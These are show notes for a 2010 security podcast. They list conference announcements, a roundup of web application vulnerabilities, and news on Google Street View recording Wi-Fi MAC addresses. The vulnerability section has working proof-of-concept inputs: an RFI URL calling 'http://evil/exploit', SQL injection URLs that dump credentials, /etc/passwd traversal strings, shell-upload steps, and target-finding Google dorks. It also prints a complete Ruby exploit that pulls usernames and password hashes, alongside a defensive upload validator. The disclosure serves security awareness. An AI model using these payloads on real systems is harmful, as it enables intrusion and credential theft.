ISD Podcast Episode 116 for April 26, 2010. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.
Announcements:
MyHardDriveDied.com:
- MHDD Data Recovery Class current dates and locations:
- San Diego – May 10th-14th
- San Francisco – June 14th-18th
- Atlanta – July 12th-16th
- Chicago – September 13th-17th
- Dallas, TX – October 11th-15th
- Washington DC – December 6th-10th
- Cost is $3500 for all classes. To reserve and register, call (678) 445-9007, email smoulton@nicservices.com or go to http://www.myharddrivedied.com
SANS Community Atlanta:
- SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)
SANS Mentoring Program:
- Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)
Atlanta ISSA:
- Atlanta Secureworld Expo April 27 – 28, 2010 Cobb Galleria Centre (http://www.secureworldexpo.com/events/index.php?id=281)
- The ISSA chapter is hosting a CISSP workshop from May 26 to August 14 (preparing for the August 15, 2010 exam), 6:00 to 9:00 PM, two sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University. The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training@gaissa.org.
- ISSA International Conference – September 16, 2010 (http://www.issa.org/page/?p=105)
North Alabama ISSA:
- Hosting the second annual North Alabama Cyber Security Summit, to be held on June 9th in Huntsville, AL. The event is open to ISSA members at a discounted price ($35; full price is $50).
- For more information please visit the North Alabama ISSA's web site at: http://northalabama.issa.org/
Kentuckiana ISSA:
- 6.5 hour Metasploit class on May 8th 2010 from 10am to 4:30pm (http://www.irongeek.com/i.php?page=security/louisville-metasploit-class)
Friends of the Podcast: Web hosting services: WebSpeedway
Vulnerabilities of Interest:
- Mp3 Online Id Tag Editor is subject to a Remote File Inclusion (RFI) vulnerability. Proof of Concept URLs are available: http://www.sample.com/mp3/velid3/module.archive.gzip.php?determined_format[include]=http://evil/exploit?
- PhpMesFilms is subject to a SQL Injection vulnerability. Version 1.8 is impacted, though others may be as well. Proof of Concept URLs are available: http://www.sample.com/phpmesfilms_1.8/index.php?id=3+union+select+1,2,3,4,concat(user(),0x3a,@@version),6,7,8,9,10--
- Multi-Mirror is subject to a Remote Upload vulnerability. Proof of Concept is available: Step 1 – http://www.sample.com/Multi-Mirror/ (Select Mirrors 2 upload file and select file 2 upload) Step 2 – http://www.sample.com/Multi-Mirror/temp_files (After Upload)
- Mihalism Multi Host is subject to an Upload vulnerability. Version 4.0.0 is impacted, though others may be as well. Google Dork "inurl: Mihalis". Proof of Concept is available: Step 1 – http://www.sample.com/Mihalis/index.php (Use Tamper Data) Step 2 – http://www.sample.com/Mihalis/images/02j3gul0lkay3ggoz5ci.php (File Name)
- Magic Uploader Mini is subject to an Upload vulnerability. Google Dork "inurl: miniuploader". Proof of Concept is available: Step 1 – http://www.sample.com/miniuploader/index.php (Use Tamper Data) Step 2 – http://www.sample.com/miniuploader/uploads/ (File Name)
- Almnzm is subject to a SQL Injection vulnerability. Versions older than 2.1 are impacted, though others may be as well. Example URL is available: http://www.sample.com/index.php?a=pages&id=3' and 1=0 UnIon aLL Select 1,2,concat(username,0x3a,password),4,5,6,7 from almnzm_customers--%20
- Bild Flirt is subject to a SQL Injection vulnerability. Versions older than 1.0 are impacted, though others may be as well. Exploit code is available:

```ruby
#!/usr/bin/ruby
#4004-security-project.com
#Discovered and vulnerability by Easy Laster
print "
#########################################################
#               4004-Security-Project                   #
#########################################################
#       Bild Flirt <= version 1.0 SQL Injection         #
#                      Exploit                          #
#               Using Host+Path+userid                  #
#            www.demo.de   /bildflirt/   1              #
#                     Easy Laster                       #
#########################################################
"
require 'net/http'
print "#########################################################"
print "\nEnter host name (site.com)->"
host=gets.chomp
print "#########################################################"
print "\nEnter script path (/forum/)->"
path=gets.chomp
print "#########################################################"
print "\nEnter script path (userid)->"
userid=gets.chomp
print "#########################################################"
begin
  # First query: pull the user name, wrapped in ##### markers so it can be found in the page
  dir = "index.php?id=999999999+and+1=0+union+select+concat(0x23,0x23,0x23,0x23,0x23,name,0x23,0x23,0x23,0x23,0x23)+from+bildf_user+where+user_id="+ userid +"--"
  http = Net::HTTP.new(host, 80)
  resp= http.get(path+dir)
  print "\nThe Username is -> "+(/#####(.+)#####/).match(resp.body)[1]
  # Second query: same technique against the passwort column
  dir = "index.php?id=999999999+and+1=0+union+select+concat(0x23,0x23,0x23,0x23,0x23,passwort,0x23,0x23,0x23,0x23,0x23)+from+bildf_user+where+user_id="+ userid +"--"
  http = Net::HTTP.new(host, 80)
  resp= http.get(path+dir)
  print "\nMD5 Password Hash is -> "+(/#####(.+)#####/).match(resp.body)[1]
  print "\n#########################################################"
rescue
  print "\nExploit failed"
end
```
- YUI Images Script is subject to a Shell Upload vulnerability. Version 1.0 is impacted, though others may be as well. Google Dork "inurl: YUI-upload". Example URLs are available: http://www.sample.com/YUI-upload/html (Upload shell .php.giff) http://www.sample.com/YUI-upload/html/files/ (Your Shell.php.giff)
- Opentel Openmairie tel is subject to a Local File Inclusion (LFI) vulnerability. Version 1.02 is impacted, though others may be as well. Google Dork "inurl: scr/soustab". Example URL is available: http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00
- Openstock Facture is subject to a Local File Inclusion (LFI) vulnerability. Version 2.02 is impacted, though others may be as well. Google Dork "inurl: scr/soustab". Example URL is available: http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00
- iMesh is subject to a Buffer Overflow vulnerability. Versions older than 7.1.0.x are impacted, though others may be as well. Exploit code is available: a milw0rm proof of concept (2007-12-18) that loads the IMWebControl ActiveX control (classid 7C3B01BC-53A5-48A0-A43B-0C67731134B9) from an HTML page, heap-sprays shellcode and then calls IMWebControl.SetHandler and IMWebControl.ProcessRequestEx.
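The upload entries above (Multi-Mirror, Mihalism Multi Host, Magic Uploader Mini and YUI Images Script) share one root cause: the server accepts whatever file name and content type the browser sends, so a PHP file renamed to .php.giff, or pushed through with Tamper Data, lands in a web-served directory. As an added example that is not code from any of those projects, here is a server-side validator, written in Python so it can be run and checked directly, that a practitioner can port into the PHP upload handler; the file names and contents used are constructed.

```python
import os
import secrets

# Added example (not code from any project listed above): server-side checks
# for an image upload handler. Extensions the handler will store, each with the
# magic bytes its content must start with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Extensions Apache+PHP may execute; with mod_mime AddHandler they are honoured
# even when another extension follows (the shell.php.giff trick above).
EXECUTABLE = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi", "pl", "sh"}


def validate_upload(client_name: str, data: bytes):
    """Return (ok, reason_or_ext). The browser's file name and Content-Type
    header are never trusted: every decision is made from the bytes received."""
    base = os.path.basename(client_name.replace("\\", "/"))  # drop any path
    if "\x00" in base:
        return False, "null byte in file name"
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0] or not parts[-1]:
        return False, "missing base name or extension"    # also rejects .htaccess
    exts = parts[1:]
    if len(exts) > 1:
        return False, "multiple extensions"               # rejects shell.php.giff
    if exts[0] in EXECUTABLE:
        return False, "executable extension"              # rejects x.php, x.phtml
    if exts[0] not in ALLOWED:
        return False, "extension not allowed"             # rejects .giff, .exe, ...
    if not any(data.startswith(m) for m in ALLOWED[exts[0]]):
        return False, "content does not match extension"  # PHP source inside a .gif
    return True, exts[0]


def stored_name(ext: str) -> str:
    """Never reuse the client's name: pick a random one under our own extension.
    Store it in a directory where script execution is disabled."""
    return f"{secrets.token_hex(16)}.{ext}"
```

Client-side checks bypassed with Tamper Data are irrelevant to this code, because it only looks at what actually arrived at the server.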
Stories of Interest:
News item 1: http://www.theregister.co.uk/2010/04/22/google_streetview_logs_wlans/
Google's roving Street View spycam may blur your face, but it's got your number. The Street View service is under fire in Germany for scanning private WLAN networks and recording users' unique MAC (Media Access Control) addresses as the car trundles along. Germany's Federal Commissioner for Data Protection Peter Schaar says he's "horrified" by the discovery. "I am appalled… I call upon Google to delete previously unlawfully collected personal data on the wireless network immediately and stop the rides for Street View," according to German broadcaster ARD. Spooks have long desired the ability to cross-reference the MAC address of a user's connection with their real identity and virtual identity, such as their Gmail or Facebook account. Other companies have logged broadcasting WLAN networks and published the information. By contrast, Google has not published the WLAN map, or Street View in Germany; Google hopes to launch the service by the end of the year. It has been publicly known since at least 2008 that companies such as Skyhook equip test vehicles with Wi-Fi scanners. The company has offered its Wi-Fi signal and mobile phone data to software developers for years and, according to its own figures, has mapped 80 million Wi-Fi locations worldwide. To that point, the first iPhone used the Skyhook technology to determine the approximate location of the phone using a number of wireless signals. The major difference here is that Skyhook's technology is not made public.
News item 2: http://www.guardian.co.uk/technology/2010/apr/20/google-google-street-view
Google has hit out at state attempts to clamp down on the internet by revealing governments' requests to remove data from the web and get information about users. Tonight it released a web page with a map showing country by country where it has had government requests or court orders to remove content from the YouTube video service or its search results, or to provide details about users of its services. The release of the tool, announced on its official blog, comes as it has had to counter complaints from data protection authorities in 10 countries, including the UK, that its Street View product, which provides pictures of public streets, and its ad-hoc social networking service Buzz "were launched without due consideration of privacy and data protection laws" and that Buzz in particular "betrayed a disappointing disregard for fundamental privacy norms". Details provided by Google cover requests between 1 July and 31 December 2009, and show that in the UK there were 1,166 requests for data about users and 59 requests to remove web pages in Google's services such as YouTube, or from its search results for the web. It complied with 45, or 76%, of the 59 requests, of which 43 were about YouTube videos. It does not specify which government agency – such as the police or others – made the request.
